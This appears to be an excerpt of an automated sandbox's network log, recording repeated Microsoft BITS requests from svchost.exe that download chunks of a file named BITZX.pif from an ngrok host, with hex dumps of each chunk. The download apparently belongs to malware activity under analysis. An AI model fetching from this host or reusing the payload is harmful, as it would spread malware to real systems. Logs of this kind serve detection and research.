        2024-12-16 16:41:42 UTC243INData Raw: 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00
        Data Ascii: *0*0*0*0*.(C(9***.(C(9*0**0*0*0*.(C(9***0**0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        44192.168.11.20497583.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:45 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=11475-11933
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:45 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 459
        Content-Range: bytes 11475-11933/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:45 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:45 UTC459INData Raw: 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00
        Data Ascii: **0**.(C(9***0**0*0*0*0*0*0*0*0*0*.(C(9**


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        45192.168.11.20497593.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:47 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=11934-12205
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:47 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 272
        Content-Range: bytes 11934-12205/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:46 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:47 UTC272INData Raw: 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 16 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a
        Data Ascii: **.(C(9*******0**0**0*0*0*0*0*0*0*.(C(9**


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        46192.168.11.20497603.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:49 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=12206-12319
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:49 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 114
        Content-Range: bytes 12206-12319/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:48 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:49 UTC114INData Raw: 28 39 f5 00 06 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00
        Data Ascii: (9*0**0*0*0*0*0*0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        47192.168.11.20497613.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:51 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=12320-12384
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:51 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 65
        Content-Range: bytes 12320-12384/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:51 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:51 UTC65INData Raw: 04 00 00 00 00 00 00 00 00 00 14 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13
        Data Ascii: *.(C(9***0**


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        48192.168.11.20497623.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:54 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=12385-12422
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:54 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 38
        Content-Range: bytes 12385-12422/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:53 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:54 UTC38INData Raw: 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14
        Data Ascii: 0**0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        49192.168.11.20497633.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:41:57 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=12423-12554
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:41:57 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 132
        Content-Range: bytes 12423-12554/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:41:56 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:41:57 UTC132INData Raw: 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00
        Data Ascii: **0**0**0***.(C(9***0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        50192.168.11.20497643.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:01 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=12555-12775
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:01 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 221
        Content-Range: bytes 12555-12775/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:01 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:01 UTC221INData Raw: 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00
        Data Ascii: **0*0*0*0*0*0*0*0*0*0*0*.(C(9***0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        51192.168.11.20497653.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:04 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=12776-12864
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:05 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 89
        Content-Range: bytes 12776-12864/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:03 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:05 UTC89INData Raw: 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13
        Data Ascii: **0**0**0**


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        52192.168.11.20497663.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:08 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=12865-13028
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:09 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 164
        Content-Range: bytes 12865-13028/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:08 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:09 UTC164INData Raw: 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a
        Data Ascii: 0**0**0**0**0**0**0**


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        53192.168.11.20497673.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:12 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=13029-13162
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:13 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 134
        Content-Range: bytes 13029-13162/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:12 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:13 UTC134INData Raw: 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00
        Data Ascii: .(C(9****0**0**0*0*.(C(9*


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        54192.168.11.20497683.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:15 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=13163-13231
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:16 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 69
        Content-Range: bytes 13163-13231/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:16 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:16 UTC69INData Raw: 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14
        Data Ascii: ****0*.(C(9**


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        55192.168.11.20497693.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:17 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=13232-13352
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:18 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 121
        Content-Range: bytes 13232-13352/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:18 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:18 UTC121INData Raw: 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00
        Data Ascii: **0*0*.(C(9****0*0*0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        56192.168.11.20497703.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:20 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=13353-13547
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:21 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 195
        Content-Range: bytes 13353-13547/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:20 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:21 UTC195INData Raw: 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00
        Data Ascii: *.(C(9****0*0*.(C(9****0**0**0*0*0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        57192.168.11.20497713.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:24 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=13548-13738
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:25 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 191
        Content-Range: bytes 13548-13738/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:24 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:25 UTC191INData Raw: 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00
        Data Ascii: *.(C(9****0*0*.(C(9****0***0*.(C(9***


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        58192.168.11.20497723.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:27 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=13739-13841
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:28 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 103
        Content-Range: bytes 13739-13841/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:28 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:28 UTC103INData Raw: 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00
        Data Ascii: ***0*0*.(C(9****0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        59192.168.11.20497733.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:30 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=13842-14154
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:31 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 313
        Content-Range: bytes 13842-14154/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:31 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:31 UTC313INData Raw: 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00
        Data Ascii: **0**0*0*.(C(9****0*0*.(C(9****0**0**0**0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        60192.168.11.20497743.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:34 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=14155-14621
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:34 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 467
        Content-Range: bytes 14155-14621/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:33 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:42:34 UTC467INData Raw: 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 22 00 14 a5 a3 00 00 01 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00
        Data Ascii: *0*"*0*0*.(C(9****0*0*.(C(9****0*0*.(C(9*****0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        61192.168.11.20497753.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:42:37 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=14622-14826
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:42:37 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 205
        Content-Range: bytes 14622-14826/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:42:37 GMT
        Etag: "1519247886"
